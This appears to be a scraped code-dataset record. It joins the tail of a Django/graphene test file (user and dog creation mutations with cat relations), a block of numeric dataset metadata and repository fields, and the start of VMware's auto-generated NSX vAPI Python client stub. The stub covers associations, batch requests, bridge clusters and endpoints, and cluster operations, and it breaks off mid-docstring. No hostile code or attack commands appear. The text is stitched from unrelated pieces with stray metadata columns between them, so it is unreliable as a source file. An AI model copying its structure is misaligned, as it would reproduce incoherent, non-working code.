create_user = CreateUserMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateUser(
$input: CreateUserInput!
){
createUser(input: $input){
user{
id
cats{
edges{
node{
id
}
}
}
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"username": "john",
"email": "test@example.com",
"firstName": "John",
"lastName": "Doe",
"cats": [to_global_id("CatNode", cat.id)],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
self.assertIsNone(result.errors)
self.assertEqual(
to_global_id("CatNode", cat.id), data.createUser.user.cats.edges[0].node.id
)
new_user = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
# Load from database
cat.refresh_from_db()
self.assertEqual(cat, new_user.cats.first())
class TestCreateWithPlainManyToManyRelation(TestCase):
def test__many_to_one_relation_exists__creates_specified_fields(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateDogMutation(DjangoCreateMutation):
class Meta:
model = Dog
class Mutations(graphene.ObjectType):
create_dog = CreateDogMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation CreateDog(
$input: CreateDogInput!
){
createDog(input: $input){
dog{
id
enemies{
edges{
node{
id
}
}
}
}
}
}
"""
result = schema.execute(
mutation,
variables={
"input": {
"name": "Sparky",
"breed": "HUSKY",
"tag": "1234",
"owner": to_global_id("UserNode", user.id),
"enemies": [to_global_id("CatNode", cat.id)],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
data = Dict(result.data)
self.assertIsNone(result.errors)
self.assertEqual(
to_global_id("CatNode", cat.id), data.createDog.dog.enemies.edges[0].node.id
)
new_dog = Dog.objects.get(pk=disambiguate_id(data.createDog.dog.id))
# Load from database
cat.refresh_from_db()
self.assertEqual(cat, new_dog.enemies.first())
| 31.44511
| 88
| 0.492748
| 5,115
| 63,016
| 5.906549
| 0.050049
| 0.021084
| 0.022177
| 0.026811
| 0.900172
| 0.890408
| 0.882861
| 0.869059
| 0.857375
| 0.848967
| 0
| 0.00373
| 0.408674
| 63,016
| 2,003
| 89
| 31.460809
| 0.807047
| 0.048638
| 0
| 0.75169
| 0
| 0
| 0.23386
| 0.002523
| 0
| 0
| 0
| 0
| 0.061463
| 1
| 0.027658
| false
| 0.008605
| 0.028888
| 0.002459
| 0.138906
| 0.000615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85ac97b749f998cc27ba414e8130b0b3bc95b327
| 862,532
|
py
|
Python
|
com/vmware/nsx_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Associations(VapiInterface):
"""
"""
LIST_ASSOCIATED_RESOURCE_TYPE_NSGROUP = "NSGroup"
"""
Possible value for ``associatedResourceType`` of method
:func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_NSGROUP = "NSGroup"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_IPSET = "IPSet"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_MACSET = "MACSet"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_LOGICALSWITCH = "LogicalSwitch"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_LOGICALPORT = "LogicalPort"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_VIRTUALMACHINE = "VirtualMachine"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_DIRECTORYGROUP = "DirectoryGroup"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_VIRTUALNETWORKINTERFACE = "VirtualNetworkInterface"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
LIST_RESOURCE_TYPE_TRANSPORTNODE = "TransportNode"
"""
Possible value for ``resourceType`` of method :func:`Associations.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.associations'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _AssociationsStub)
self._VAPI_OPERATION_IDS = {}
def list(self,
associated_resource_type,
resource_id,
resource_type,
cursor=None,
fetch_ancestors=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about resources that are associated with the given
resource. Id and type of the resource for which associated resources
are to be fetched are to be specified as query parameter in the URI.
Resource type of the associated resources must be specified as query
parameter.
:type associated_resource_type: :class:`str`
:param associated_resource_type: Resource type valid for use as target in association API (required)
:type resource_id: :class:`str`
:param resource_id: The resource for which associated resources are to be fetched
(required)
:type resource_type: :class:`str`
:param resource_type: Resource type valid for use as source in association API (required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type fetch_ancestors: :class:`bool` or ``None``
:param fetch_ancestors: Fetch complete list of associated resources considering containment
and nesting (optional, default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.AssociationListResult`
:return: com.vmware.nsx.model.AssociationListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'associated_resource_type': associated_resource_type,
'resource_id': resource_id,
'resource_type': resource_type,
'cursor': cursor,
'fetch_ancestors': fetch_ancestors,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class Batch(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.batch'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BatchStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
batch_request,
atomic=None,
):
"""
Enables you to make multiple API requests using a single request. The
batch API takes in an array of logical HTTP requests represented as
JSON arrays. Each request has a method (GET, PUT, POST, or DELETE), a
relative_url (the portion of the URL after https://<nsx-mgr>/api/),
optional headers array (corresponding to HTTP headers) and an optional
body (for POST and PUT requests). The batch API returns an array of
logical HTTP responses represented as JSON arrays. Each response has a
status code, an optional headers array and an optional body (which is a
JSON-encoded string).
:type batch_request: :class:`com.vmware.nsx.model_client.BatchRequest`
:param batch_request: (required)
:type atomic: :class:`bool` or ``None``
:param atomic: transactional atomicity for the batch of requests embedded in the
batch list (optional, default to false)
:rtype: :class:`com.vmware.nsx.model_client.BatchResponse`
:return: com.vmware.nsx.model.BatchResponse
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'batch_request': batch_request,
'atomic': atomic,
})
class BridgeClusters(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.bridge_clusters'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BridgeClustersStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
bridge_cluster,
):
"""
Creates a bridge cluster. It is collection of transport nodes that will
do the bridging for overlay network to vlan networks. Bridge cluster
may have one or more transport nodes
:type bridge_cluster: :class:`com.vmware.nsx.model_client.BridgeCluster`
:param bridge_cluster: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeCluster`
:return: com.vmware.nsx.model.BridgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'bridge_cluster': bridge_cluster,
})
def delete(self,
bridgecluster_id,
):
"""
Removes the specified Bridge Cluster.
:type bridgecluster_id: :class:`str`
:param bridgecluster_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'bridgecluster_id': bridgecluster_id,
})
def get(self,
bridgecluster_id,
):
"""
Returns information about a specified bridge cluster.
:type bridgecluster_id: :class:`str`
:param bridgecluster_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeCluster`
:return: com.vmware.nsx.model.BridgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'bridgecluster_id': bridgecluster_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all configured bridge clusters
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.BridgeClusterListResult`
:return: com.vmware.nsx.model.BridgeClusterListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
bridgecluster_id,
bridge_cluster,
):
"""
Modifies a existing bridge cluster. One of more transport nodes can be
added or removed from the bridge cluster using this API.
:type bridgecluster_id: :class:`str`
:param bridgecluster_id: (required)
:type bridge_cluster: :class:`com.vmware.nsx.model_client.BridgeCluster`
:param bridge_cluster: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeCluster`
:return: com.vmware.nsx.model.BridgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'bridgecluster_id': bridgecluster_id,
'bridge_cluster': bridge_cluster,
})
class BridgeEndpointProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.bridge_endpoint_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BridgeEndpointProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
bridge_endpoint_profile,
):
"""
Creates a Bridge Endpoint Profile. Profile contains edge cluster id,
indexes of the member nodes, fialover mode and high availability mode
for a Bridge EndPoint
:type bridge_endpoint_profile: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
:param bridge_endpoint_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
:return: com.vmware.nsx.model.BridgeEndpointProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'bridge_endpoint_profile': bridge_endpoint_profile,
})
def delete(self,
bridgeendpointprofile_id,
):
"""
Deletes the specified Bridge Endpoint Profile.
:type bridgeendpointprofile_id: :class:`str`
:param bridgeendpointprofile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'bridgeendpointprofile_id': bridgeendpointprofile_id,
})
def get(self,
bridgeendpointprofile_id,
):
"""
Returns information about a specified bridge endpoint profile.
:type bridgeendpointprofile_id: :class:`str`
:param bridgeendpointprofile_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
:return: com.vmware.nsx.model.BridgeEndpointProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'bridgeendpointprofile_id': bridgeendpointprofile_id,
})
def list(self,
cursor=None,
edge_cluster_id=None,
failover_mode=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all configured bridge endoint profiles
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type edge_cluster_id: :class:`str` or ``None``
:param edge_cluster_id: Edge Cluster Identifier (optional)
:type failover_mode: :class:`str` or ``None``
:param failover_mode: (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfileListResult`
:return: com.vmware.nsx.model.BridgeEndpointProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'edge_cluster_id': edge_cluster_id,
'failover_mode': failover_mode,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
bridgeendpointprofile_id,
bridge_endpoint_profile,
):
"""
Modifies a existing bridge endpoint profile.
:type bridgeendpointprofile_id: :class:`str`
:param bridgeendpointprofile_id: (required)
:type bridge_endpoint_profile: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
:param bridge_endpoint_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
:return: com.vmware.nsx.model.BridgeEndpointProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'bridgeendpointprofile_id': bridgeendpointprofile_id,
'bridge_endpoint_profile': bridge_endpoint_profile,
})
class BridgeEndpoints(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.bridge_endpoints'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BridgeEndpointsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
bridge_endpoint,
):
"""
Creates a Bridge Endpoint. It describes the physical attributes of the
bridge like vlan. A logical port can be attached to a vif providing
bridging functionality from the logical overlay network to the physical
vlan network
:type bridge_endpoint: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
:param bridge_endpoint: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
:return: com.vmware.nsx.model.BridgeEndpoint
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'bridge_endpoint': bridge_endpoint,
})
def delete(self,
bridgeendpoint_id,
):
"""
Deletes the specified Bridge Endpoint.
:type bridgeendpoint_id: :class:`str`
:param bridgeendpoint_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'bridgeendpoint_id': bridgeendpoint_id,
})
def get(self,
bridgeendpoint_id,
):
"""
Returns information about a specified bridge endpoint.
:type bridgeendpoint_id: :class:`str`
:param bridgeendpoint_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
:return: com.vmware.nsx.model.BridgeEndpoint
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'bridgeendpoint_id': bridgeendpoint_id,
})
def list(self,
bridge_cluster_id=None,
bridge_endpoint_profile_id=None,
cursor=None,
included_fields=None,
logical_switch_id=None,
page_size=None,
sort_ascending=None,
sort_by=None,
vlan_transport_zone_id=None,
):
"""
Returns information about all configured bridge endoints
:type bridge_cluster_id: :class:`str` or ``None``
:param bridge_cluster_id: Bridge Cluster Identifier (optional)
:type bridge_endpoint_profile_id: :class:`str` or ``None``
:param bridge_endpoint_profile_id: Bridge endpoint profile used by the edge cluster (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type logical_switch_id: :class:`str` or ``None``
:param logical_switch_id: Logical Switch Identifier (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type vlan_transport_zone_id: :class:`str` or ``None``
:param vlan_transport_zone_id: VLAN transport zone id used by the edge cluster (optional)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointListResult`
:return: com.vmware.nsx.model.BridgeEndpointListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'bridge_cluster_id': bridge_cluster_id,
'bridge_endpoint_profile_id': bridge_endpoint_profile_id,
'cursor': cursor,
'included_fields': included_fields,
'logical_switch_id': logical_switch_id,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'vlan_transport_zone_id': vlan_transport_zone_id,
})
def update(self,
bridgeendpoint_id,
bridge_endpoint,
):
"""
Modifies a existing bridge endpoint.
:type bridgeendpoint_id: :class:`str`
:param bridgeendpoint_id: (required)
:type bridge_endpoint: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
:param bridge_endpoint: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeEndpoint`
:return: com.vmware.nsx.model.BridgeEndpoint
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'bridgeendpoint_id': bridgeendpoint_id,
'bridge_endpoint': bridge_endpoint,
})
class Cluster(VapiInterface):
"""
"""
REMOVENODE_FORCE_TRUE = "true"
"""
Possible value for ``force`` of method :func:`Cluster.removenode`.
"""
REMOVENODE_FORCE_FALSE = "false"
"""
Possible value for ``force`` of method :func:`Cluster.removenode`.
"""
REMOVENODE_GRACEFUL_SHUTDOWN_TRUE = "true"
"""
Possible value for ``gracefulShutdown`` of method :func:`Cluster.removenode`.
"""
REMOVENODE_GRACEFUL_SHUTDOWN_FALSE = "false"
"""
Possible value for ``gracefulShutdown`` of method :func:`Cluster.removenode`.
"""
REMOVENODE_IGNORE_REPOSITORY_IP_CHECK_TRUE = "true"
"""
Possible value for ``ignoreRepositoryIpCheck`` of method
:func:`Cluster.removenode`.
"""
REMOVENODE_IGNORE_REPOSITORY_IP_CHECK_FALSE = "false"
"""
Possible value for ``ignoreRepositoryIpCheck`` of method
:func:`Cluster.removenode`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ClusterStub)
self._VAPI_OPERATION_IDS = {}
def backuptoremote(self):
"""
Request one-time backup. The backup will be uploaded using the same
server configuration as for automatic backup.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('backuptoremote', None)
def create(self,
target_node_id,
target_uri,
):
"""
Invoke POST request on target cluster node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID or keyword self (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def delete(self,
target_node_id,
target_uri,
):
"""
Invoke DELETE request on target cluster node
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID or keyword self (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def get(self):
"""
Returns information about the NSX cluster configuration. An NSX cluster
has two functions or purposes, commonly referred to as \"roles.\" These
two roles are control and management. Each NSX installation has a
single cluster. Separate NSX clusters do not share data. In other
words, a given data-plane node is attached to only one cluster, not to
multiple clusters.
:rtype: :class:`com.vmware.nsx.model_client.ClusterConfig`
:return: com.vmware.nsx.model.ClusterConfig
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
def get_0(self,
node_id,
):
"""
Returns information about the specified NSX cluster node.
:type node_id: :class:`str`
:param node_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ClusterNodeInfo`
